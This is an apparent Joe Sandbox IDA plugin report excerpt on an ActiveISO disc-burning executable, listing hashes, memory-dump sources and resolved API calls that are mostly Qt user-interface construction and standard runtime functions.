                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: 10a239026a922a028d6645af2516df9bce6fe4bd6f599e5fc810a1eaa7076bc5
                                                                                                                  • Instruction ID: 5eb34ecabc6face29ce1d5ce64442af861476ab3eaf0502fab70b9755c3ebf5f
                                                                                                                  • Opcode Fuzzy Hash: 10a239026a922a028d6645af2516df9bce6fe4bd6f599e5fc810a1eaa7076bc5
                                                                                                                  • Instruction Fuzzy Hash: 7002D532E246C185E724DF2094266FA27A6FB85F88F188571EA0DEB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_Star$BurnerCdvdGrabber_$Disc$memset$ArrayInformationSpace$?allocate@AdvancedAllocationBlankData@@Data@@@@@FastFlags@FormatsFreeMediaOption@ReadSupportedTrackU1@_Used
                                                                                                                  • String ID: Blank
                                                                                                                  • API String ID: 4201631297-4260031329
                                                                                                                  • Opcode ID: 615abdfda6521b0838b083657614926db99cb170d465be82e85aa79dfb70e54d
                                                                                                                  • Instruction ID: afbb9361756161d31551c732dc0114e4c3d5a730ce1e1e08df6d277431648670
                                                                                                                  • Opcode Fuzzy Hash: 615abdfda6521b0838b083657614926db99cb170d465be82e85aa79dfb70e54d
                                                                                                                  • Instruction Fuzzy Hash: AC02D532E246C185E724DF2094266FA27A6FB85F88F188571EA0DEB75ADF3CD245C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$fwrite$__acrt_iob_func__stdio_common_vfprintffgetsfreeprintf
                                                                                                                  • String ID: %s%s$-
                                                                                                                  • API String ID: 470847000-767400943
                                                                                                                  • Opcode ID: 02604e11e8eba2739794af56d29ed3b8aca4dfc8f1d07ee46596591addd66381
                                                                                                                  • Instruction ID: d0b9b4e4923dc951e5203b4b7ec44156f47879b1fe7427f4e2b17fe230082764
                                                                                                                  • Opcode Fuzzy Hash: 02604e11e8eba2739794af56d29ed3b8aca4dfc8f1d07ee46596591addd66381
                                                                                                                  • Instruction Fuzzy Hash: B7C12562E28A8546EB288F11E4423BE6792FB86F94F880235DA5EB77C5DF3CD505C704
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_time64memmoverandsrandstrncpy
                                                                                                                  • String ID: ;$;
                                                                                                                  • API String ID: 69610590-2543639521
                                                                                                                  • Opcode ID: 1bdd40e0fcdbd72c888d33cf5485c2184ca5ab555b8f26e487f3b1de028cbc8c
                                                                                                                  • Instruction ID: 8c746a78473838c6768de9dd447cc42c062ac694513e2aedc8dcb0348920a03d
                                                                                                                  • Opcode Fuzzy Hash: 1bdd40e0fcdbd72c888d33cf5485c2184ca5ab555b8f26e487f3b1de028cbc8c
                                                                                                                  • Instruction Fuzzy Hash: 6581C011E386DB85F7228B34E8123F967A2EF45B54F485131DA8DF62A1EF3CE1469708
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@$List$?at@$Array$?allocate@?child?size@AllocationCount@Data@@@@@Flags@Item@@Option@TreeU1@_Widget
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1495809797-0
                                                                                                                  • Opcode ID: c694b9ae99caa2260da7c4245b5900185315d8448cb374e6706b5ebb08b9c783
                                                                                                                  • Instruction ID: 8439f743ee261d09846f04ca04c3187010f80a3331bb98f693bd2a7e24dece85
                                                                                                                  • Opcode Fuzzy Hash: c694b9ae99caa2260da7c4245b5900185315d8448cb374e6706b5ebb08b9c783
                                                                                                                  • Instruction Fuzzy Hash: 84C1DD33F25A0686DB14CF25E09626D73A2FB84F94B5A8132CB5EA7760DF38E445C744
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$free$memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3279016580-0
                                                                                                                  • Opcode ID: 8963971aa33f9848393b67bc04afeaf3c227ddab1fd3c6082e0b2ff87b9f3c66
                                                                                                                  • Instruction ID: a03e7440c468016ed7caeb3f60355ec6ed37e847db2d276369d640a8735f16c3
                                                                                                                  • Opcode Fuzzy Hash: 8963971aa33f9848393b67bc04afeaf3c227ddab1fd3c6082e0b2ff87b9f3c66
                                                                                                                  • Instruction Fuzzy Hash: 9912D162E28B8286EB44DB65E4413AE67A6FB84BC8F480136DE4DB7B54EF7CD144C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1508699874-0
                                                                                                                  • Opcode ID: daa14259833b28adcd5efbb3aa6cb5cd1087780165a48c04a6b9ebca5445b56f
                                                                                                                  • Instruction ID: 199761e81267e9c7ce98bc5dea0cdb749c5f8e954172fe5e18b4088bffa9506d
                                                                                                                  • Opcode Fuzzy Hash: daa14259833b28adcd5efbb3aa6cb5cd1087780165a48c04a6b9ebca5445b56f
                                                                                                                  • Instruction Fuzzy Hash: D312DB05D3E3E789F202877568620F43FA29B66A14F4C01B6D4DDB2672CE1CE258F729
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF65376A7C1,?,?,?,?,?,?,00007FF653713743), ref: 00007FF65376A6CB
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00007FF65376A7C1,?,?,?,?,?,?,00007FF653713743), ref: 00007FF65376A6D4
                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,00007FF65376A7C1,?,?,?,?,?,?,00007FF653713743), ref: 00007FF65376A6DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1249254920-0
                                                                                                                  • Opcode ID: 351eb4d02d3dac2cdc40c38012c2031e1284c7f5bbc764b29ca1fe0a38c6cc95
                                                                                                                  • Instruction ID: 2ebb3ab332c3b0c93be34ca3b88dc69218360cd7063bc58d35eeeef5e0adbe17
                                                                                                                  • Opcode Fuzzy Hash: 351eb4d02d3dac2cdc40c38012c2031e1284c7f5bbc764b29ca1fe0a38c6cc95
                                                                                                                  • Instruction Fuzzy Hash: C2D09261F28A0AC6FB181BE6AC161351223FB59F49B081034CA4AB6324DE3C948AC289
                                                                                                                  APIs
                                                                                                                  • ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCA4
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCB5
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCCE
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCDB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCE6
                                                                                                                  • ?setWindowModality@QWidget@@QEAAXW4WindowModality@Qt@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FCF4
                                                                                                                  • ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD08
                                                                                                                  • ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD1D
                                                                                                                  • ?setMinimumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD29
                                                                                                                  • ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD3E
                                                                                                                  • ?setMaximumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD4A
                                                                                                                  • ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD6A
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FD99
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FDA6
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,1setProgressBarProc_waitForm(int),1setCancelVisible_waitForm(bool),00000000,1setProgressBarVisible_waitForm(),?,00000000,?,00007FF65372E783,?,?,?,?,?,00007FF6537225BE), ref: 00007FF65372FDB1
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF65372FDD1
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF65372FDDD
                                                                                                                  • ?setFrameShape@QFrame@@QEAAXW4Shape@1@@Z.QT5WIDGETS ref: 00007FF65372FDEB
                                                                                                                  • ?setFrameShadow@QFrame@@QEAAXW4Shadow@1@@Z.QT5WIDGETS ref: 00007FF65372FDF9
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65372FE10
                                                                                                                  • ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF65372FE24
                                                                                                                  • ?setPixmap@QLabel@@QEAAXAEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF65372FE31
                                                                                                                  • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FF65372FE3C
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372FE47
                                                                                                                  • ?setScaledContents@QLabel@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65372FE52
                                                                                                                  • ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65372FE72
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65372FE94
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF65372FEA2
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372FEAD
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF65372FECE
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF65372FEDB
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                  • ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65372FEFB
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65372FF1D
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF65372FF2B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372FF36
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF65372FF54
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF65372FF61
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65372FF78
                                                                                                                  • ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF65372FF8C
                                                                                                                  • ?setPixmap@QLabel@@QEAAXAEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF65372FF9A
                                                                                                                  • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FF65372FFA5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372FFB0
                                                                                                                  • ?setScaledContents@QLabel@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65372FFBC
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FE8
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FEE
                                                                                                                  • ??0QComboBox@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65372FFD9
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653730009
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653730017
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653730022
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF653730043
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF653730050
                                                                                                                  • ??0QToolButton@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65373006D
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65373009D
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF6537300AB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537300B6
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF6537300D7
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF6537300E4
                                                                                                                  • ??0QIcon@@QEAA@XZ.QT5GUI ref: 00007FF6537300EE
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653730106
                                                                                                                  • ??0QSize@@QEAA@XZ.QT5CORE ref: 00007FF653730113
                                                                                                                  • ?addFile@QIcon@@QEAAXAEBVQString@@AEBVQSize@@W4Mode@1@W4State@1@@Z.QT5GUI ref: 00007FF65373012E
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653730139
                                                                                                                  • ?setIcon@QAbstractButton@@QEAAXAEBVQIcon@@@Z.QT5WIDGETS ref: 00007FF653730147
                                                                                                                  • ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF653730167
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653730189
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653730197
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537301A2
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF6537301C1
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF6537301CE
                                                                                                                  • ?setAlignment@QLabel@@QEAAXV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF6537301DD
                                                                                                                  • ??0QToolButton@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF6537301FA
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65373021C
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF65373022A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653730235
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF653730256
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF653730263
                                                                                                                  • ??0QLineEdit@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF653730280
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF6537302B0
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF6537302BE
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537302C9
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF6537302EA
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF6537302F7
                                                                                                                  • ?setMaxLength@QLineEdit@@QEAAXH@Z.QT5WIDGETS ref: 00007FF653730306
                                                                                                                  • ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF653730326
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653730348
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653730356
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653730361
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF653730380
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF65373038D
                                                                                                                  • ?setAlignment@QLabel@@QEAAXV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373039C
                                                                                                                  • ??0QPushButton@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF6537303B9
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF6537303E9
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF6537303F7
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653730402
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF653730423
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF653730430
                                                                                                                  • ??0QPushButton@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65373044D
                                                                                                                  • ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF65373046F
                                                                                                                  • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF65373047D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653730488
                                                                                                                  • ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF6537304A9
                                                                                                                  • ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF6537304B6
